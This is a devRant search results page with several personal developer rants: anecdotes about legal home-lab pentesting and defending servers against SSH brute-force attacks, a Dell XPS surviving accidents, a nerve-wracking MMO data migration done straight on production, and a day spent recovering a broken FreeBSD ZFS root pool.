Join devRant
Do all the things like
++ or -- rants, post your own rants, comment on others' rants and build your customized dev avatar
Sign Up
Pipeless API
From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple API
Learn More
Search - "i wonder if they checked"
-
Hacking/attack experiences...
I'm, for obvious reasons, only going to talk about the attacks I went through and the *legal* ones I did 😅 😜
Let's first get some things clear/funny facts:
I've been doing offensive security since I was 14-15. Defensive since the age of 16-17. I'm getting close to 23 now, for the record.
First system ever hacked (metasploit exploit): Windows XP.
(To be clear, at home through a pentesting environment, all legal)
Easiest system ever hacked: Windows XP yet again.
Time it took me to crack/hack into today's OS's (remote + local exploits, don't remember which ones I used by the way):
Windows: XP - five seconds (damn, those metasploit exploits are powerful)
Windows Vista: Few minutes.
Windows 7: Few minutes.
Windows 10: Few minutes.
OSX (in general): 1 Hour (finding a good exploit took some time, got to root level easily aftewards. No, I do not remember how/what exactly, it's years and years ago)
Linux (Ubuntu): A month approx. Ended up using a Java applet through Firefox when that was still a thing. Literally had to click it manually xD
Linux: (RHEL based systems): Still not exploited, SELinux is powerful, motherfucker.
Keep in mind that I had a great pentesting setup back then 😊. I don't have nor do that anymore since I love defensive security more nowadays and simply don't have the time anymore.
Dealing with attacks and getting hacked.
Keep in mind that I manage around 20 servers (including vps's and dedi's) so I get the usual amount of ssh brute force attacks (thanks for keeping me safe, CSF!) which is about 40-50K every hour. Those ip's automatically get blocked after three failed attempts within 5 minutes. No root login allowed + rsa key login with freaking strong passwords/passphrases.
linu.xxx/much-security.nl - All kinds of attacks, application attacks, brute force, DDoS sometimes but that is also mostly mitigated at provider level, to name a few. So, except for my own tests and a few ddos's on both those domains, nothing really threatening. (as in, nothing seems to have fucked anything up yet)
How did I discover that two of my servers were hacked through brute forcers while no brute force protection was in place yet? installed a barebones ubuntu server onto both. They only come with system-default applications. Tried installing Nginx next day, port 80 was already in use. I always run 'pidof apache2' to make sure it isn't running and thought I'd run that for fun while I knew I didn't install it and it didn't come with the distro. It was actually running. Checked the auth logs and saw succesful root logins - fuck me - reinstalled the servers and installed Fail2Ban. It bans any ip address which had three failed ssh logins within 5 minutes:
Enabled Fail2Ban -> checked iptables (iptables -L) literally two seconds later: 100+ banned ip addresses - holy fuck, no wonder I got hacked!
One other kind/type of attack I get regularly but if it doesn't get much worse, I'll deal with that :)
Dealing with different kinds of attacks:
Web app attacks: extensively testing everything for security vulns before releasing it into the open.
Network attacks: Nginx rate limiting/CSF rate limiting against SYN DDoS attacks for example.
System attacks: Anti brute force software (Fail2Ban or CSF), anti rootkit software, AppArmor or (which I prefer) SELinux which actually catches quite some web app attacks as well and REGULARLY UPDATING THE SERVERS/SOFTWARE.
So yah, hereby :P39 -
Dells XPS are made of magic. [long story, major fuckup, 10k+ damages]
It all started in December. One morning I was late to work, drove there as fast as possible. (I live like 3 minutes away so me being late really meant *late*) Parked my car in a secluded car park, grabbed my backpack and ran to work. The car park is like 100 meters away from work so I took my feet into my hands and ran. Next thing I know my heels loose all grip while I go down a small slope and I drop on my back full force. On a sharp edged stone. With only my 1700$ XPS in it. Fuck.
I paniced, but got up and ran to work. I checked on the notebook, praying it would boot. It booted! Holy shit. I flipped the notebook and saw two small dents in the aluminum shell. I was thorougly impressed. I later discovered that it left a small shadow on the display, but given what a hit that was (I am not exactly a lightweight), impressive would be a massive understatement.
Fast forward to February, I am weighing my options to get the screen replaced maybe, as damage on my hardware (even if neglectable) triggers some sort of OCD and makes me feel bad 24/7. Also my laptop tends to shut off from time to time, looked into the Event Viewer and saw kernel panic. I figured that the battery probably still took a hit and that it drops voltage from time to time and the kernel assumes a critical situation, thus shutting off.
It stayed quite snowy in Austria up until March, so occasional snowing wasn't rare. Got out of work one day, saw it snowed a bit. Whatever. I had my moms car at the time, so I tried if it would slide a bit if I donut on the now (5pm) empty parking space. Nothing. Drove done a small hill, ABS triangle lit up red (board computer can't outbalance the snow). I drove out to the main street where everything was salted and drove along towards my house. Took a turn into my street, accelerated for a bit and then went off the gas so the car would smoothly drive along with the speed slowly degrading. So I went off the gas and noticed I was a bit to the right, no wonder, centrifugal forces.
*steers left*
"Huh seems like I need a bit more"
*car still doesnt move much*
"What the- go to the left!"
*steers left hard*
"Fuck that wall is coming closer"
*Breaks*
*car doesnt break*
"FUCK FUCK FUCK FUCK!!!"
Everything got quiet in seconds, me waking up to an open airbag, ripped pants, a hurting wrist, the radio somewhere on the ground and fumes that smellt like burning wires. I grabbed my backpack that was now somewhere on the floor instead of on the seat and ran outside, tears in my eyes and the phone on my ear calling my mom. I walked inside as she walked outside, hearing a weeping scream that I haven't heard from her since I am alive. While walking inside I noticed my backpack was wet on the bottom, my 2 litre water jug shattered when my backpack hit the dashboard. I tried to stay calm and act rational, knowing that every second counts when It comes to water damage. I hastely searched for some rice and a bag to put my laptop into, stuffed the bag with both and went outside. The car was totaled, my mom pissed and crying. And I was in shock, sad, angry and hurting.
I kept the laptop on my heater for a few days, bagged in rice. I dared to try a boot after a while and you wont believe me, it fucking booted. Even the keyboard backlight worked, just the screen was obviously broken in the back (no color distortion or bad pixel rows though!!) and the aluminum shell had a dent on the front. I talked with Dell Support a few days later, asking if it would be ok to open the XPS up so I could drain all of the water. She said yes thats fine, as long as I dont touch anything or screw around with it.
She said I can send it in and get it checked, but the pickup and analysis will cost 150$ and I can go from there.
I sent it in and estimated that, because battery, screen and other things probably needed changing, it will be around 900$.
Got a call a few weeks later:
"Hello beggarboy, the repair team reported back to us and said that they will have to replace everything, which will be 1700$."
"Fuck... Buying a new one is cheaper.."
"Yeah I know I am sorry about that, I can offer you a voucher so you can buy a new one for 250$ off if you would prefer that"
"Sorry but I will need some time to consider"
"I understand."
The agent clearly noticed I was bummed about it.
After going back and forth what to do I got another call a few days later.
"Hello beggarboy, we talked a few days ago. I have good news"
"Hello, yes, speak up?"
"I was able to get a special offer for you after putting in a few words..."
The next thing she said seemed unreal to me.
She was able to cut 600$ (!!!), making the new offer 1100$, instead of 1700$ or a new one for 1500$. I figured the reason she probably did that was because I am always very polite with support members. Always.
My XPS is back and healty again.
Thank you for taking the time to read this.
Dells XPS are made of magic.13 -
The riskiest dev choice...
How about "The riskiest thing you've done as a dev"? I have a great entry for that. and I suppose it was my choice to build the feature afterall.
I was working on an instance of a small MMO at a game company I worked for. The MMO boasted multiple servers, each of them a vastly different take on the base game. We could use, extend, or outright replace anything we wanted to, leading to everything from Zelda to pokemon to an RP haven to a top-down futuristic counterstrike. The server in this particular instance was a fantasy RPG, and I was building it a new leveling and experience system with most of the trimmings. (Talents, feats/perks, etc. were in a future update.)
A bit of background, first: the game's dev setup did not have the now-standard dev/staging/prod servers; everything ran on prod, devs worked on prod, players connected and played on prod, etc. Worse yet, there was no backup system implemented -- or not really. The CTO was really the only person with sufficient access. The techy CEO did as well, but he rarely dealt with anything technical except server hardware, occasionally. And usually just to troll/punish us devs (as in "Oops ! I pulled the cat5 ! ;)"). Neither of them were the most reliable of people, either. The CTO would occasionally remote in and make backups of each server -- we assumed whenever he happened to think of it -- and would also occasionally do it when asked, but it could take him a week, sometimes even up to a month to get around to it. So the backups were only really useful for retreiving lost code and assets, not so much for player data.
The lack of reliable backups and the lack of proper testing grounds (among the plethora of other issues at the company) made for an absolutely terrible dev setup, but that's just how it was, and that's what we dealt with. We were game devs, afterall. Terrible or not, we got to make games! What more could you ask for!? It was amazing and terrible and wonderful and the worst thing ever, all at the same time. (and no, I'm not sharing the company name, but it isn't EA or Nexon, surprisingly 😅)
Anyway, back to the story! My new leveling system also needed to migrate players' existing data, so... you can see where this is going.
I did as much testing and inspection of my code as I could, copied it from a personal dev script to the server's xp system, ... and debated if I really wanted to click [Apply]. Every time I considered it, I went back to check another part or do yet more testing. I ended up taking like 40 minutes to finally click it.
And when I did... that was the scariest button press of my life. And the scariest three seconds' wait afterwards. That one click could have ruined every single player's account, permanently lost us players ...
After applying it, I immediately checked my character to see if she was broken, checked the account data for corruption or botched flags, checked for broken interactions with the other systems....
Everything ended up working out perfectly, and the players loved all of the new features. They had no idea what went into building them, and certainly had no idea of what went into applying them, or what could have gone wrong -- which is probably a good thing.
Looking back, that entire environment was so fragile, it's a wonder things didn't go horribly wrong all the time. Really, they almost never did. Apocalypses did happen, but were exceedingly rare, and were ususally fixed quickly. I guess we were all super careful simply because everything was so fragile? or the decent devs were, at least. We never trusted the lessers with access 😅 at least on the main servers where it mattered. Some of the smaller servers... well, we never really cared about those.
But I'm honestly more surprised to realize I've never had nightmares of that button click. It was certainly terrifying enough.
But yay! Complete system overhaul and migration of stored and realtime player data! on prod! With no issues! And lots of happy players! Woooooo!
Thinking back on it makes me happy 😊rant deploying straight to prod prod prod prod dev server? dev on prod you chicken migration on prod wk149 git? who's a git? you're a git! scariest deploy ever game development1 -
My Sunday Morning until afternoon. FML. So I was experiencing nightly reboots of my home server for three days now. Always at 3:12am strange thing. Sunday morning (10am ca) I thought I'd investigate because the reboots affected my backups as well. All the logs and the security mails said was that some processes received signal 11. Strange. Checked the periodics tasks and executed every task manually. Nothing special. Strange. Checked smart status for all disks. Two disks where having CRC errors. Not many but a couple. Oh well. Changing sata cables again 🙄. But those CRC errors cannot be the reason for the reboots at precisely the same time each night. I noticed that all my zpools got scrubbed except my root-pool which hasn't been scrubbed since the error first occured. Well, let's do it by hand: zpool scrub zroot....Freeze. dafuq. Walked over to the server and resetted. Waited 10 minutes. System not up yet. Fuuu...that was when I first guessed that Sunday won't be that sunny after all. Connected monitor. Reset. Black screen?!?! Disconnected all disks aso. Reset. Black screen. Oh c'moooon! CMOS reset. Black screen. Sigh. CMOS reset with a 5 minute battery removal. And new sata cable just in cable. Yes, boots again. Mood lightened... Now the system segfaults when importing zroot. Good damnit. Pulled out the FreeBSD bootstick. zpool import -R /tmp zroot...segfault. reboot. Read-only zroot import. Manually triggering checksum test with the zdb command. "Invalid blckptr type". Deep breath now. Destroyed pool, recreated it. Zfs send/recv from backup. Some more config. Reboot. Boots yeah ... Doesn't find files??? Reboot. Other error? Undefined symbols???? Now I need another coffee. Maybe I did something wrong during recovery? Not very likely but let's do it again...recover-recover. different but same horrible errors. What in the name...? Pulled out a really old disk. Put it in, boots fine. So it must be the disks. Walked around the house and searched for some new disks for a new 2 disk zfs root mirror to replace the obviously broken disks. Found some new ones even. Recovery boot, minimal FreeBSD Install for bootloader aso. Deleted and recreated zroot, zfs send/recv from backup. Set bootfs attribute, reboot........
It works again. Fuckit, now it is 6pm, I still haven't showered. Put both disks through extensive tests and checked every single block. These disks aren't faulty. But for some reason they froze my system in a way so that I had to reset my BIOS and they had really low level data errors....? I Wonder if those disks have a firmware problem? So that was most of my Sunday. Nice, isn't it? But hey: calm sea won't make a good sailor, right?3